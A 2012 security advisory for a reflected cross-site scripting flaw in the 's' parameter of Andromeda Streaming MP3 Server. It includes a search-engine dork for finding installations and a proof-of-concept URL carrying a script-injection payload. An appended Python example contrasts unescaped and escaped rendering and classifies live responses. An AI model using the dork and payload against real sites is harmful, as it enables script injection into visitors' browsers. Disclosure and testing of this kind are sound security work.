Andromeda Streaming MP3 Server Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

Andromeda Streaming MP3 Server v1.9.3.6 (s param) Remote XSS Vulnerability


Vendor: Turnstyle
Product web page: 
Affected version: PHP (2012)

Summary: Turn your MP3 collection into an MP3 server. Simply add a single PHP or ASP script to any folder within your site. Now you can browse and play the contents of that folder - over the Web, or over your local network.

Desc: Andromeda is prone to a reflected cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 's' parameter of the 'andromeda.php' script before echoing it back into the page. An attacker can exploit this by getting a victim to follow a crafted link, causing arbitrary script to run in the victim's browser in the context of the affected site.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.9
           MySQL 5.5.20


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5087
Advisory URL: 

08.05.2012

--


Dork: "powered by andromeda version"

PoC:

http://localhost/AndromedaPHP/andromeda.php?q=s&s="><script>alert(1);</script>
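The reflection behind the PoC, as an added example that is not part of the advisory and not Andromeda's own code. The andromeda.php source is not on this page, so the example assumes (an assumption) that the 's' value is echoed verbatim into a double-quoted attribute of the search form, which is exactly what the leading `">` of the PoC payload is built to break out of. The two render_* functions stand in for the server's response, once as the vulnerable pattern and once hardened with attribute-context HTML encoding; classify_reflection parses a response the way a browser would and tells an unescaped reflection (a <script> element now exists) from an escaped one (the payload only survives as an attribute value). All function names and markup are constructed for this example.

```python
"""Model of the reflected XSS in the 's' parameter of andromeda.php.

Constructed example: render_search_box_vulnerable / render_search_box_fixed
stand in for the server's HTML response and are NOT the real andromeda.php
code (the attribute-reflection context is an assumption).
"""
import html
import urllib.parse
from html.parser import HTMLParser

BASE_URL = "http://localhost/AndromedaPHP/andromeda.php"  # from the advisory's PoC
PAYLOAD = '"><script>alert(1);</script>'                 # the advisory's PoC payload


def render_search_box_vulnerable(s: str) -> str:
    """Assumed vulnerable pattern: the 's' value is written verbatim into a
    double-quoted attribute. The payload's leading '">' closes the attribute
    and the <input> tag, and everything after it is parsed as markup."""
    return f'<form><input type="text" name="s" value="{s}"></form>'


def render_search_box_fixed(s: str) -> str:
    """Hardened form: encode for an attribute context (quote=True also turns
    '"' into &quot;), so the browser keeps the whole value inside the attribute."""
    return f'<form><input type="text" name="s" value="{html.escape(s, quote=True)}"></form>'


def build_poc_url(base: str = BASE_URL, payload: str = PAYLOAD) -> str:
    """URL-encode the advisory's PoC so an HTTP client sends it intact."""
    return base + "?" + urllib.parse.urlencode({"q": "s", "s": payload})


class _TagCollector(HTMLParser):
    """Record every start tag with its (entity-decoded) attributes, in order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Parse a response as a browser would and report one of:
    'executed'      - a <script> element exists, i.e. the payload became markup;
    'escaped'       - the payload came back, but only as an attribute value;
    'not reflected' - the payload does not appear in any attribute at all."""
    parser = _TagCollector()
    parser.feed(body)
    parser.close()
    if any(tag == "script" for tag, _ in parser.tags):
        return "executed"
    if any(payload in attrs.values() for _, attrs in parser.tags):
        return "escaped"
    return "not reflected"


if __name__ == "__main__":
    print(build_poc_url())
    print("vulnerable render:", classify_reflection(render_search_box_vulnerable(PAYLOAD)))
    print("fixed render:     ", classify_reflection(render_search_box_fixed(PAYLOAD)))
```

Against a live target, feed the body of the HTTP response for build_poc_url() into classify_reflection instead of the render_* output; 'executed' reproduces the advisory, 'escaped' means the value was encoded for the attribute context, and 'not reflected' means the parameter never reached that attribute at all.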

